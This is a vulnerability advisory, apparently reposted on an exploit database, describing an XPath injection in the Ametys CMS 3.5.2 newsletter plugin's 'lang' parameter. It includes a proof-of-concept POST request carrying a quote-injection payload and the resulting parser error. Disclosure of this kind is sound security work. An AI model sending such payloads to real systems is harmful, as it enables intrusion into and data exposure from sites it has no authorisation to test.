###########################

# Ametys CMS 3.5.2 (lang parameter) XPath Injection Vulnerability

###########################

 Ametys CMS 3.5.2 (lang parameter) XPath Injection Vulnerability


Vendor: Anyware Services
Product web page: http://www.ametys.org
Affected version: 3.5.2 and 3.5.1

Summary: Ametys is a Java-based open source CMS combining
rich content with an easy-to-use and intuitive interface.

Desc: Input passed via the 'lang' POST parameter in the
newsletter plugin is not properly sanitised before being
used to construct a XPath query for XML data. This can be
exploited to manipulate XPath queries by injecting arbitrary
XPath code.

Tested on: Microsoft Windows 7 Ultimate (EN) 32bit
Jetty 6.1.21


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2013-5162
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5162.php


24.11.2013

--



Request:
--------

POST /cms/plugins/newsletter/category/nodes HTTP/1.1
Host: 192.168.8.11:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.8.11:8080/cms/event/index.html
Content-Length: 137
Cookie: ametys.accept.non.supported.navigators=on; JSESSIONID=1na81i031qhdw;
__utma=111872281.3880910164568079000.1385252858.1385252858.1385252858.1; __utmb=111872281.1.10.1385252858;
__utmc=111872281; __utmz=111872281.1385252858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

sitename=event&categoriesOnly=&debug=%255Bobject%2520Object%255D&userLocale=en&siteName=event&skin=d
emo&categoryID=root&lang=en'&node=root


Response:
---------

HTTP/1.1 500 Internal Server Error
Date: Sun, 24 Nov 2013 00:55:08 GMT
Content-Type: text/html; charset=utf-8
Server: Jetty(6.1.21)
Content-Length: 27280

...
...
org.apache.jackrabbit.spi.commons.query.xpath.ParseException:

Encountered "\'//element(*, ametys:page)[@ametys-internal:tags
=\'" at line 1, column 68.
Was expecting one of:
"or" ...
"and" ...
"div" ...
"idiv" ...
"mod" ...
"*" ...
"return" ...
"to" ...
"where" ...
"intersect" ...
"union" ...
"except" ...
<Instanceof> ...
<Castable> ...
"/" ...
"//" ...
"=" ...
"is" ...
...
...



###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2013-12-04]

###########################